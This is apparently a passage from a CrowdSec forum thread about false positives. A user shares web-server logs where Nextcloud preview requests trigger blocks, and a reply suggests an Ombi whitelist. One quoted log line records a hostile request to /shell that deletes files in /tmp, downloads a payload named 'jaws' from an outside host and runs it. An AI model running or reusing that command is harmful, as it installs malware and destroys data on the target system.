xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/apps/theming/img/core/filetypes/package-x-generic.svg?v=0 HTTP/1.1" 200 1223 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4441 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=20714 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4768 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=191296 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=257268 HTTP/1.1" 200 7218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:05 +0200] "GET /nextcloud/core/img/rating/s4.svg HTTP/1.1" 200 2040 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"

I would like to know why I get blocked and stuff like this not:

95.137.137.171 - - [07/Aug/2022:23:27:34 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws" 400 483 "-" "-"
106.75.50.30 - - [08/Aug/2022:10:59:31 +0200] "GET / HTTP/1.1" 200 5563 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:36 +0200] "GET /favicon.ico HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:36 +0200] "GET /sitemap.xml HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:38 +0200] "GET /robots.txt HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"

Hello,

Given the behavior of ombi, I do not a see a “generic” workaround for this (it would require crowdsec to do smart things and be too sensitive to false negatives).

I think the best way would be to have a whitelist for ombi to avoid this specific false positive. It should even be part of the ombi collection created by @lepresidente : CrowdSec Hub

Do you believe this false positive impacts all the default setups ?